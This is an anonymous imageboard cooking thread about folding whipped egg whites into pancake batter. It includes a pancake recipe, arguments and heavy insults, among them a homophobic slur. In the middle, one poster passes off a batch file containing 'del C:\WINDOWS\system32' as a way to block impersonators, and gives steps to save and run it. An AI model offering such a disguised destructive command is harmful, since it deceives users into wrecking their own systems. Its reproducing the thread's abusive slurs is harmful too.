Does whisking egg whites then folding them into pancake/waffle batter actually make much difference?

Does whisking egg whites then folding them into pancake/waffle batter actually make much difference?

I'm gonna make some pancakes tomorrow and I was thinking on trying it this way for a Change but I don't have an electric mixer so I don't want to waste my time if there isn't a significant difference.

It makes them lighter and fluffier, so yes.

But is it really noticeable?

Try it yourself you daft fuck

Why would I make this thread then you temperamental little shit?

>not using a copper bowl
>muh stiff peaks

shiggy diggy

I bet it would, add a bit of cream of tartar to it to stabilize the whites as well, I'm interested to know the outcome OP

I don't have cream of tartar so I used tartar sauce instead and it came out terrible, fuck your shitty advice faggot.

This isn't me. How do I block fakers on this website forum?

whipped egg whites are the entire leavening method for many cakes user. it will obviously make a difference.

delete system32

>Why would I make this thread then
That is a mystery to which only you know the answer, but fuck, if a lot of us aren't wondering the same thing.

How do I go about doing this?

Does it impact the flavour?

>Ask questions
>Why are you asking questions on a cooking board???

I hope you realise that's literally you right now.

open notepad
type the following:
@echo off
del C:\\WINDOWS\system32

save as "copycat_block.bat" and save as "all files" instead of "text document", then run the resulting file

It adds a lot of air flavor.

>Does it impact the flavour?
in general they are more brittle, drier and less flavourful. cakes made with whipped egg whites are often heavily iced, brushed with syrup or topped with fruit and other stuff. the point of the egg whites is lightness. try it yourself and see what you like. you may or may not want a light pancake.

Message me and I can get you a permanent account

Going to try it right now. Thanks.

I will try this if the other "Anonymous" method does not work.

I've only eaten pancakes once when I visited the US and they're made by a machine with a treadmill on the hotel. Give me a recipe for the best pancake I can make

fakers gonna fake
it's part of the fun

Because you're a lazy cunt and would rather ask others the answers to your questions then answer them yourself.

2 cups of plain flour
2 tablespoons of sugar
1 tablespoon of baking powder
2 eggs
5 tablespoons melted butter
Milk

Mix the wet ingredients together then add to dry. Slowly whisk and leave some lumps in the batter for extra fluffiness. Dry non stick is best for pancakes but if you don't got one,some lightly oiled steel/iron pan will work well. Cook on medium until bubbles start to form and edges get dry. Flip and repeat. Wa la.

I didn't specify on how much milk because it depends on your preference. If you like thickand fluffy then make sure your batter is nice and thick but if you want crispy and light then add more milk.

>Slowly whisk and leave some lumps in the batter for extra fluffiness
who doesn't love biting into a lump of unmixed flour and or baking powder. Yum

>Ask a question about food on a cooking board
>WHY ARE YOU ASKING QUESTIONS???

Who hurt you in the past that you feel the need to be so negative about everything?

This isn't how it works. Try making some pancakes yourself for once and give mommy a break.

>i have never baked before

my mothers pancake batter was lumpy as shit. there were no pockets of flour in the finished pancakes

This post exemplifies one of the worst problems Veeky Forums has. When somebody who actually knows how to make something gets attacked by people who have literally never done it before and still think they know better,

that's the internet son. if you wanna have a good time, go play in the street. there is no justice here

>does changing the recipe change the recipe?

You can easily whip egg whites by hand. I make all of my souffles and meringues without a mixer. Try it out.

Lol, you butt ravaged by shit that happens everywhere on the internet every microsecond.

I could see it worth while in pancake batter
But not so much for waffles desu